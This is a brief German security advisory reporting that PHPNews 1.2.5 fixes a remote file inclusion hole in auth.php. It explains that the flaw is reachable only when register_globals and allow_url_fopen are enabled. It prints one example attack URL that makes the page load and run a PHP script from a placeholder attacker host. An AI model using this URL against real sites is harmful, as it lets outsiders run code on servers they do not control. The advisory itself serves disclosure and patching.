Gefixte PHPNews Version verfügbar

Die aktuelle Version 1.2.5 von PHPNews -- eine webbasierte News-Board-Software -- schließt eine File-Injection-Schwachstelle:

Eingaben über den Parameter "?path=xyz" in der Datei "auth.php" werden vor der Verwendung zum Einbinden von Dateien nicht gründlich genug überprüft. Durch http://[Opfer]/[PHPNews-Vezeichniss]/auth.php?path=http://[Angreifer-Datei]/ kann ein Angreifer beispielsweise eigene PHP-Scripte nachladen und ausführen lassen. Dieser Fehler tritt nur auf, wenn die Optionen register_globals und allow_url_fopen angeschaltet sind.

Siehe dazu auch:

• PHPNews Downloads vom Hersteller
• PHPNews <= 1.2.4 - Remote File Inclusion auf Bugtraq
• SQL-Injection-Lücke in PHPNews beseitigt